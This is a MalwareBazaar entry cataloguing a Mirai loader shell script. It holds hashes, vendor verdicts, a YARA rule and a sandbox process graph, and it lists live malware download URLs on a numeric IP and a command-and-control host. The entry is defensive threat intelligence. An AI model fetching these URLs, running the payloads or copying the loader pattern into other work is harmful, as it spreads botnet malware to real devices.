MalwareBazaar Database

You are currently viewing the MalwareBazaar entry for SHA256 0cff3d53bc4c2b36478f401d8ea437eb990f2818f9dd20cb116f894bdf0f18ff. While MalwareBazaar tries to identify whether the sample provided is malicious or not, there is no guarantee that a sample in MalwareBazaar is malicious.

Database Entry


Threat unknown


Vendor detections: 5


Intelligence 5 IOCs YARA 1 File information Comments
Download sample Add tag Delete this sample Report a False Positive

SHA256 hash: 0cff3d53bc4c2b36478f401d8ea437eb990f2818f9dd20cb116f894bdf0f18ff
SHA3-384 hash: 025eeb0703a82203aa8cd5ba8ec8e999be51bbadba8fccbf3c0af5acdb8b7b64b096ad5e11fecc951793ff3db790f94a
SHA1 hash: 5facbf0d4bd0a8bd7c8fd4a7b3a4002d9de5daf5
MD5 hash: 9e57e9d3415565f1ce390c95c4e47845
humanhash: kentucky-india-jersey-minnesota
File name:w.sh
Download: download sample
File size:1'172 bytes
First seen:2026-05-14 02:49:07 UTC
Last seen:2026-05-14 14:04:47 UTC
File type: sh
MIME type:text/plain
ssdeep 12:y75bA1MftNIOWAerKgHgKAlN3Q3qgNrX47OrcALyuAzA+90Ln:W5bhNIvKsJpI7sm9In
TLSH T14121F5D802A1BE99C989CD04706E87446184C6D334E4EBD89CBD58BF6B85E10F16DFAF
Magika txt
Reporter abuse_ch
Tags:sh
URLMalware sample (SHA256 hash)SignatureTags
http://156.238.242.196/manji.arm402f4cc2631d467285e7da67c1cc6a94f5719bce4e26ce26ff8605ad37697abbe Miraiarm elf mirai opendir ua-wget
http://156.238.242.196/manji.arm5c217d74d21449bed31d7a882a830b0b35ca7e1c9da1aa9d4d5ca1923e4401c93 Miraiarm elf mirai opendir ua-wget
http://156.238.242.196/manji.arm6cdf7e0346ea4f27dc3aa07e98ef4d1d87fe269bcf45022999931f84ddb0c0ece Miraiarm elf mirai opendir ua-wget
http://156.238.242.196/manji.arm75fa602bdd9f6156629e7b8ef4ac87b7c3f903a812ec63e7988fb343cfa36bc89 Miraiarm elf mirai opendir ua-wget
http://156.238.242.196/manji.sh4927eaae876733594f2889b37b1701a8d90ad708bf83da4dd77e967966c51873f Miraielf mirai opendir SuperH ua-wget
http://156.238.242.196/manji.arc4d10e894f61f4145fcb923f4f465058e2f8b0ec03b06be9dce9678f35d94a134 Miraiarc elf mirai opendir ua-wget
http://156.238.242.196/manji.mips1319fc34a179751881b02a64be28a48be30ec0aaef7100e964995d60ed478973 Miraielf mips mirai opendir ua-wget
http://156.238.242.196/manji.mpslda6b482991f7adca439cc9208321e0e05fafcf3dcfd41a299cb0b667256ac276 Miraielf mips mirai opendir ua-wget
http://156.238.242.196/manji.spc019df454f6accab72dcb3c8723043e8a4ce512ef15748547d370ef89872685a0 Miraielf mirai opendir sparc ua-wget
http://156.238.242.196/manji.x86298f12ed211ccb843022b76357e7daca81b4adc337bc12e4a82e093ce06b6ade Miraielf mirai opendir ua-wget x86
http://156.238.242.196/manji.i6864dfec9b7cd5d733c4873b773316e804d380f90ae5562fb7b2cc7a9304b6fabf8 Miraielf mirai opendir ua-wget x86
http://156.238.242.196/manji.i4862ee7081223b0b64ae4994d8caaaa586468850287daa93b0c980b42177d37b1f8 Miraielf mirai opendir ua-wget x86
http://156.238.242.196/manji.apk5fa602bdd9f6156629e7b8ef4ac87b7c3f903a812ec63e7988fb343cfa36bc89 Miraiarm elf mirai opendir ua-wget

Intelligence

File Origin
# of uploads :
369
# of downloads :
0
Origin country :
DE DE
Vendor Threat Intelligence
No detections
Verdict:
Malicious
Threat level:
  10/10
Confidence:
100%
Tags:
busybox mirai
Link:
https://www.filescan.io/uploads/6a05c3b09b72a1a5304d54a4/reports/b846a121-7d55-40fe-a88e-e467e0964bde/overview
Result
Gathering data
Status:
terminated
Link:
https://sandbox.kunai.rocks/analysis/ba8b9c89-fbab-4298-ab9e-4189a52a3f46
Behavior Graph:
Download SVG
%3 guuid=c995783d-1900-0000-2477-2fbe4b0b0000 pid=2891 /usr/bin/sudo guuid=2b4fd23f-1900-0000-2477-2fbe510b0000 pid=2897 /tmp/sample.bin guuid=c995783d-1900-0000-2477-2fbe4b0b0000 pid=2891->guuid=2b4fd23f-1900-0000-2477-2fbe510b0000 pid=2897 execve guuid=8f280940-1900-0000-2477-2fbe520b0000 pid=2898 /usr/bin/busybox guuid=2b4fd23f-1900-0000-2477-2fbe510b0000 pid=2897->guuid=8f280940-1900-0000-2477-2fbe520b0000 pid=2898 execve guuid=9c3b5840-1900-0000-2477-2fbe540b0000 pid=2900 /usr/bin/chmod guuid=2b4fd23f-1900-0000-2477-2fbe510b0000 pid=2897->guuid=9c3b5840-1900-0000-2477-2fbe540b0000 pid=2900 execve guuid=bc3eb640-1900-0000-2477-2fbe560b0000 pid=2902 /usr/bin/dash guuid=2b4fd23f-1900-0000-2477-2fbe510b0000 pid=2897->guuid=bc3eb640-1900-0000-2477-2fbe560b0000 pid=2902 clone guuid=530bc040-1900-0000-2477-2fbe570b0000 pid=2903 /usr/bin/busybox net send-data write-file guuid=2b4fd23f-1900-0000-2477-2fbe510b0000 pid=2897->guuid=530bc040-1900-0000-2477-2fbe570b0000 pid=2903 execve guuid=e8ac027e-1900-0000-2477-2fbeb80b0000 pid=3000 /usr/bin/chmod guuid=2b4fd23f-1900-0000-2477-2fbe510b0000 pid=2897->guuid=e8ac027e-1900-0000-2477-2fbeb80b0000 pid=3000 execve guuid=ba86417e-1900-0000-2477-2fbeba0b0000 pid=3002 /usr/bin/dash guuid=2b4fd23f-1900-0000-2477-2fbe510b0000 pid=2897->guuid=ba86417e-1900-0000-2477-2fbeba0b0000 pid=3002 clone guuid=c97f2280-1900-0000-2477-2fbebf0b0000 pid=3007 /usr/bin/busybox net send-data write-file guuid=2b4fd23f-1900-0000-2477-2fbe510b0000 pid=2897->guuid=c97f2280-1900-0000-2477-2fbebf0b0000 pid=3007 execve guuid=e09f3bbc-1900-0000-2477-2fbe4a0c0000 pid=3146 /usr/bin/chmod guuid=2b4fd23f-1900-0000-2477-2fbe510b0000 pid=2897->guuid=e09f3bbc-1900-0000-2477-2fbe4a0c0000 pid=3146 execve guuid=6f7f9bbc-1900-0000-2477-2fbe4c0c0000 pid=3148 /usr/bin/dash guuid=2b4fd23f-1900-0000-2477-2fbe510b0000 pid=2897->guuid=6f7f9bbc-1900-0000-2477-2fbe4c0c0000 pid=3148 clone guuid=9c0870bd-1900-0000-2477-2fbe520c0000 pid=3154 /usr/bin/busybox net send-data write-file guuid=2b4fd23f-1900-0000-2477-2fbe510b0000 pid=2897->guuid=9c0870bd-1900-0000-2477-2fbe520c0000 pid=3154 execve guuid=47f96307-1a00-0000-2477-2fbea50c0000 pid=3237 /usr/bin/chmod guuid=2b4fd23f-1900-0000-2477-2fbe510b0000 pid=2897->guuid=47f96307-1a00-0000-2477-2fbea50c0000 pid=3237 execve guuid=16f5ee07-1a00-0000-2477-2fbea60c0000 pid=3238 /usr/bin/dash guuid=2b4fd23f-1900-0000-2477-2fbe510b0000 pid=2897->guuid=16f5ee07-1a00-0000-2477-2fbea60c0000 pid=3238 clone guuid=8c47000a-1a00-0000-2477-2fbeac0c0000 pid=3244 /usr/bin/busybox net send-data write-file guuid=2b4fd23f-1900-0000-2477-2fbe510b0000 pid=2897->guuid=8c47000a-1a00-0000-2477-2fbeac0c0000 pid=3244 execve guuid=67b80348-1a00-0000-2477-2fbe0b0d0000 pid=3339 /usr/bin/chmod guuid=2b4fd23f-1900-0000-2477-2fbe510b0000 pid=2897->guuid=67b80348-1a00-0000-2477-2fbe0b0d0000 pid=3339 execve guuid=6ac47a48-1a00-0000-2477-2fbe0c0d0000 pid=3340 /usr/bin/dash guuid=2b4fd23f-1900-0000-2477-2fbe510b0000 pid=2897->guuid=6ac47a48-1a00-0000-2477-2fbe0c0d0000 pid=3340 clone guuid=454a4e4a-1a00-0000-2477-2fbe0f0d0000 pid=3343 /usr/bin/busybox net send-data write-file guuid=2b4fd23f-1900-0000-2477-2fbe510b0000 pid=2897->guuid=454a4e4a-1a00-0000-2477-2fbe0f0d0000 pid=3343 execve guuid=9baa2094-1a00-0000-2477-2fbeb20d0000 pid=3506 /usr/bin/chmod guuid=2b4fd23f-1900-0000-2477-2fbe510b0000 pid=2897->guuid=9baa2094-1a00-0000-2477-2fbeb20d0000 pid=3506 execve guuid=969b7394-1a00-0000-2477-2fbeb30d0000 pid=3507 /usr/bin/dash guuid=2b4fd23f-1900-0000-2477-2fbe510b0000 pid=2897->guuid=969b7394-1a00-0000-2477-2fbeb30d0000 pid=3507 clone guuid=f81c8895-1a00-0000-2477-2fbeb50d0000 pid=3509 /usr/bin/busybox net send-data write-file guuid=2b4fd23f-1900-0000-2477-2fbe510b0000 pid=2897->guuid=f81c8895-1a00-0000-2477-2fbeb50d0000 pid=3509 execve guuid=5ba892e0-1a00-0000-2477-2fbe470e0000 pid=3655 /usr/bin/chmod guuid=2b4fd23f-1900-0000-2477-2fbe510b0000 pid=2897->guuid=5ba892e0-1a00-0000-2477-2fbe470e0000 pid=3655 execve guuid=2380ece0-1a00-0000-2477-2fbe480e0000 pid=3656 /usr/bin/dash guuid=2b4fd23f-1900-0000-2477-2fbe510b0000 pid=2897->guuid=2380ece0-1a00-0000-2477-2fbe480e0000 pid=3656 clone guuid=9d92a3e2-1a00-0000-2477-2fbe4a0e0000 pid=3658 /usr/bin/busybox net send-data write-file guuid=2b4fd23f-1900-0000-2477-2fbe510b0000 pid=2897->guuid=9d92a3e2-1a00-0000-2477-2fbe4a0e0000 pid=3658 execve guuid=68a05f2d-1b00-0000-2477-2fbe010f0000 pid=3841 /usr/bin/chmod guuid=2b4fd23f-1900-0000-2477-2fbe510b0000 pid=2897->guuid=68a05f2d-1b00-0000-2477-2fbe010f0000 pid=3841 execve guuid=205fde2d-1b00-0000-2477-2fbe020f0000 pid=3842 /usr/bin/dash guuid=2b4fd23f-1900-0000-2477-2fbe510b0000 pid=2897->guuid=205fde2d-1b00-0000-2477-2fbe020f0000 pid=3842 clone guuid=0b7a7530-1b00-0000-2477-2fbe060f0000 pid=3846 /usr/bin/busybox net send-data write-file guuid=2b4fd23f-1900-0000-2477-2fbe510b0000 pid=2897->guuid=0b7a7530-1b00-0000-2477-2fbe060f0000 pid=3846 execve guuid=e855aa6c-1b00-0000-2477-2fbe9c0f0000 pid=3996 /usr/bin/chmod guuid=2b4fd23f-1900-0000-2477-2fbe510b0000 pid=2897->guuid=e855aa6c-1b00-0000-2477-2fbe9c0f0000 pid=3996 execve guuid=91fa216d-1b00-0000-2477-2fbe9d0f0000 pid=3997 /usr/bin/dash guuid=2b4fd23f-1900-0000-2477-2fbe510b0000 pid=2897->guuid=91fa216d-1b00-0000-2477-2fbe9d0f0000 pid=3997 clone guuid=704fe76d-1b00-0000-2477-2fbea20f0000 pid=4002 /usr/bin/busybox net send-data write-file guuid=2b4fd23f-1900-0000-2477-2fbe510b0000 pid=2897->guuid=704fe76d-1b00-0000-2477-2fbea20f0000 pid=4002 execve guuid=4a4bfba9-1b00-0000-2477-2fbe48100000 pid=4168 /usr/bin/chmod guuid=2b4fd23f-1900-0000-2477-2fbe510b0000 pid=2897->guuid=4a4bfba9-1b00-0000-2477-2fbe48100000 pid=4168 execve guuid=d8ee55aa-1b00-0000-2477-2fbe49100000 pid=4169 /home/sandbox/manji.x86 guuid=2b4fd23f-1900-0000-2477-2fbe510b0000 pid=2897->guuid=d8ee55aa-1b00-0000-2477-2fbe49100000 pid=4169 execve guuid=a28973aa-1b00-0000-2477-2fbe4b100000 pid=4171 /usr/bin/busybox net send-data write-file guuid=2b4fd23f-1900-0000-2477-2fbe510b0000 pid=2897->guuid=a28973aa-1b00-0000-2477-2fbe4b100000 pid=4171 execve guuid=5aeabc6d-1c00-0000-2477-2fbe6b100000 pid=4203 /usr/bin/chmod guuid=2b4fd23f-1900-0000-2477-2fbe510b0000 pid=2897->guuid=5aeabc6d-1c00-0000-2477-2fbe6b100000 pid=4203 execve guuid=cde4f96d-1c00-0000-2477-2fbe6f100000 pid=4207 /home/sandbox/manji.i686 guuid=2b4fd23f-1900-0000-2477-2fbe510b0000 pid=2897->guuid=cde4f96d-1c00-0000-2477-2fbe6f100000 pid=4207 execve guuid=ebab086e-1c00-0000-2477-2fbe71100000 pid=4209 /usr/bin/busybox net send-data write-file guuid=2b4fd23f-1900-0000-2477-2fbe510b0000 pid=2897->guuid=ebab086e-1c00-0000-2477-2fbe71100000 pid=4209 execve guuid=be51c5a9-1c00-0000-2477-2fbe07110000 pid=4359 /usr/bin/chmod guuid=2b4fd23f-1900-0000-2477-2fbe510b0000 pid=2897->guuid=be51c5a9-1c00-0000-2477-2fbe07110000 pid=4359 execve guuid=fd3359aa-1c00-0000-2477-2fbe08110000 pid=4360 /home/sandbox/manji.i486 guuid=2b4fd23f-1900-0000-2477-2fbe510b0000 pid=2897->guuid=fd3359aa-1c00-0000-2477-2fbe08110000 pid=4360 execve guuid=6a4384aa-1c00-0000-2477-2fbe0a110000 pid=4362 /usr/bin/busybox net send-data write-file guuid=2b4fd23f-1900-0000-2477-2fbe510b0000 pid=2897->guuid=6a4384aa-1c00-0000-2477-2fbe0a110000 pid=4362 execve guuid=4b0b0903-1d00-0000-2477-2fbe4e110000 pid=4430 /usr/bin/chmod guuid=2b4fd23f-1900-0000-2477-2fbe510b0000 pid=2897->guuid=4b0b0903-1d00-0000-2477-2fbe4e110000 pid=4430 execve guuid=10477e03-1d00-0000-2477-2fbe50110000 pid=4432 /usr/bin/dash guuid=2b4fd23f-1900-0000-2477-2fbe510b0000 pid=2897->guuid=10477e03-1d00-0000-2477-2fbe50110000 pid=4432 clone guuid=65218d04-1d00-0000-2477-2fbe55110000 pid=4437 /usr/bin/rm delete-file guuid=2b4fd23f-1900-0000-2477-2fbe510b0000 pid=2897->guuid=65218d04-1d00-0000-2477-2fbe55110000 pid=4437 execve d315db92-aead-5a78-84ac-c7d355badc69 156.238.242.196:80 guuid=530bc040-1900-0000-2477-2fbe570b0000 pid=2903->d315db92-aead-5a78-84ac-c7d355badc69 send: 88B guuid=c97f2280-1900-0000-2477-2fbebf0b0000 pid=3007->d315db92-aead-5a78-84ac-c7d355badc69 send: 88B guuid=9c0870bd-1900-0000-2477-2fbe520c0000 pid=3154->d315db92-aead-5a78-84ac-c7d355badc69 send: 88B guuid=8c47000a-1a00-0000-2477-2fbeac0c0000 pid=3244->d315db92-aead-5a78-84ac-c7d355badc69 send: 87B guuid=454a4e4a-1a00-0000-2477-2fbe0f0d0000 pid=3343->d315db92-aead-5a78-84ac-c7d355badc69 send: 87B guuid=f81c8895-1a00-0000-2477-2fbeb50d0000 pid=3509->d315db92-aead-5a78-84ac-c7d355badc69 send: 88B guuid=9d92a3e2-1a00-0000-2477-2fbe4a0e0000 pid=3658->d315db92-aead-5a78-84ac-c7d355badc69 send: 88B guuid=0b7a7530-1b00-0000-2477-2fbe060f0000 pid=3846->d315db92-aead-5a78-84ac-c7d355badc69 send: 87B guuid=704fe76d-1b00-0000-2477-2fbea20f0000 pid=4002->d315db92-aead-5a78-84ac-c7d355badc69 send: 87B guuid=d31a6aaa-1b00-0000-2477-2fbe4a100000 pid=4170 /home/sandbox/manji.x86 dns net send-data write-file zombie guuid=d8ee55aa-1b00-0000-2477-2fbe49100000 pid=4169->guuid=d31a6aaa-1b00-0000-2477-2fbe4a100000 pid=4170 clone 8b0a01dc-0728-52c1-8024-c4ba7801b8d6 8.8.8.8:53 guuid=d31a6aaa-1b00-0000-2477-2fbe4a100000 pid=4170->8b0a01dc-0728-52c1-8024-c4ba7801b8d6 send: 448B 2ac2249c-25bc-5019-a88f-33a6c2731b07 cnc.504.su:56999 guuid=d31a6aaa-1b00-0000-2477-2fbe4a100000 pid=4170->2ac2249c-25bc-5019-a88f-33a6c2731b07 send: 25B guuid=a28973aa-1b00-0000-2477-2fbe4b100000 pid=4171->d315db92-aead-5a78-84ac-c7d355badc69 send: 88B guuid=94e9036e-1c00-0000-2477-2fbe70100000 pid=4208 /home/sandbox/manji.i686 guuid=cde4f96d-1c00-0000-2477-2fbe6f100000 pid=4207->guuid=94e9036e-1c00-0000-2477-2fbe70100000 pid=4208 clone guuid=ebab086e-1c00-0000-2477-2fbe71100000 pid=4209->d315db92-aead-5a78-84ac-c7d355badc69 send: 88B guuid=0a6475aa-1c00-0000-2477-2fbe09110000 pid=4361 /home/sandbox/manji.i486 guuid=fd3359aa-1c00-0000-2477-2fbe08110000 pid=4360->guuid=0a6475aa-1c00-0000-2477-2fbe09110000 pid=4361 clone guuid=6a4384aa-1c00-0000-2477-2fbe0a110000 pid=4362->d315db92-aead-5a78-84ac-c7d355badc69 send: 87B
Score:
100%
Verdict:
Malware
File Type:
SCRIPT
Link:
https://malprob.io/report/0cff3d53bc4c2b36478f401d8ea437eb990f2818f9dd20cb116f894bdf0f18ff
Gathering data
Threat name:
Linux.Downloader.Generic
Create hunting rule
Status:
Suspicious
First seen:
2026-05-14 07:28:44 UTC
File Type:
Text (Shell)
AV detection:
14 of 36 (38.89%)
Threat level:
  3/5
Detection(s):
Suspicious file
Link:
https://check.spamhaus.org/check/?searchterm=bt7t2u54jqvtmr4piaoy5jbx5omq6kay7hosbsyrn6euxxypdd7q._file
Please note that we are no longer able to provide a coverage score for Virus Total.
Threat name:
Legit
Score:
0.05
Link:
https://yomi.yoroi.company/submissions/0cff3d53bc4c2b36478f401d8ea437eb990f2818f9dd20cb116f894bdf0f18ff

YARA Signatures

MalwareBazaar uses YARA rules from several public and non-public repositories, such as YARAhub and Malpedia. Those are being matched against malware samples uploaded to MalwareBazaar as well as against any suspicious process dumps they may create. Please note that only results from TLP:CLEAR rules are being displayed.

Rule name:MAL_Linux_IoT_MultiArch_BotnetLoader_Generic
Create hunting rule
Author:Anish Bogati
Description:Technique-based detection of IoT/Linux botnet loader shell scripts downloading binaries from numeric IPs, chmodding, and executing multi-architecture payloads
Reference:MalwareBazaar sample lilin.sh

File information

The table below shows additional information about this malware sample such as delivery method and external references.

Web download

sh 0cff3d53bc4c2b36478f401d8ea437eb990f2818f9dd20cb116f894bdf0f18ff

(this sample)

Mirai

elf 02f4cc2631d467285e7da67c1cc6a94f5719bce4e26ce26ff8605ad37697abbe

  
URLhaus
https://urlhaus.abuse.ch/url/3846456/
  
Delivery method
Distributed via web download
  
URLhaus
https://urlhaus.abuse.ch/url/3846463/
  
Dropping
MD5 47876d3be8c3c755913f6118e87aebce
  
Dropping
SHA256 02f4cc2631d467285e7da67c1cc6a94f5719bce4e26ce26ff8605ad37697abbe

Comments